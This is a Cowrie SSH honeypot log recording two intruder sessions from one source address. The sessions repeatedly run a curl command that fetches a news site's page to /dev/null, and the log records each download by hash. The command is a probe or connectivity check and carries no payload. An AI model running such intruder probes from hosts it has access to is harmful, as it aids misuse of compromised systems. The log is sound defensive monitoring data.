{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.612431Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.638963Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.639971Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.646101Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.647191Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.677645Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.678856Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.686655Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.687545Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.689260Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.732324Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.733552Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.737889Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.738981Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.757648Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.760227Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.766902Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.768943Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.771386Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.773674Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.774632Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.778397Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.780284Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.789492Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.792722Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.793643Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.802308Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.803805Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.823346Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.824264Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.830642Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.834587Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.835697Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.837836Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.851515Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.862428Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.863314Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.869444Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.870204Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.888043Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.901162Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.902021Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.903824Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.904620Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.941471Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.942770Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.945867Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.946530Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.957005Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.980228Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.981460Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.986858Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.987735Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.994153Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.005231Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.017866Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.018855Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.028355Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.029439Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.039048Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.054867Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.055722Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.067984Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.069250Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.089553Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.090631Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.091420Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.107066Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.107918Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.129546Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.130355Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.132363Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.139660Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.150155Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.150911Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.167803Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.168964Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.187193Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.187952Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.197044Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.199276Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.201358Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.203907Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.204644Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.227953Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.228487Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.238737Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.239418Z","src_ip":"212.227.125.160","session":"7541ed730449"}
